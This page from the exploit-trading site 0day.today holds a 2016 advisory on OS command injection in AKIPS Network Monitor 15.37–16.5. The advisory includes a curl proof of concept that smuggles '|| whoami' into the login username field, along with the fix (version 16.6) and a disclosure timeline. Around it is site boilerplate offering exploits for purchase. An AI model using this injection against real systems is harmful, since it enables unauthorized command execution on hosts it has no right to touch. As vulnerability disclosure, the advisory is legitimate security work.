0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
# Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection # Date: 03-14-2016 # Exploit Author: BrianWGray # Contact: https://twitter.com/BrianWGray # WebPage: http://somethingbroken.com/ # Vendor Homepage: https://www.akips.com/ # Software Link: https://www.akips.com/showdoc/download # Version: 15.37 through 16.5, May impact earlier versions, remediated in 16.6 # Tested on: FreeBSD 10.2-RELEASE-p7 # CVE : N/A 1. Description The "username" login parameter allows for OS Command injection via command Injection during a failed login attempt returns the command injection output to a limited login failure field. By using concatenation '||' a command may be appended to the username. The vendor has stated the following: "Apparently the issue is in a Perl module which does an open2() of a custom PAM program. The command is not being properly sanitised." - Vendor Reply http://somethingbroken.com/vuln/0002.html 2. Proof of Concept example request: curl 'https://Application/' --data 'username=%7C%7C+whoami&password=' --compressed --insecure -# | grep -wF "Error signing in:" example response: <div class="alert alert-warning"><strong>Error signing in:</strong> akips</div> 3. Solution: Update to version 16.6 https://www.akips.com/showdoc/download 4. Timeline: * 03-14-2016: Discovered, Vendor Notified, Vendor Response * 03-15-2016: Vendor Releases Remediated Build 16.6 # 0day.today [2024-11-16] #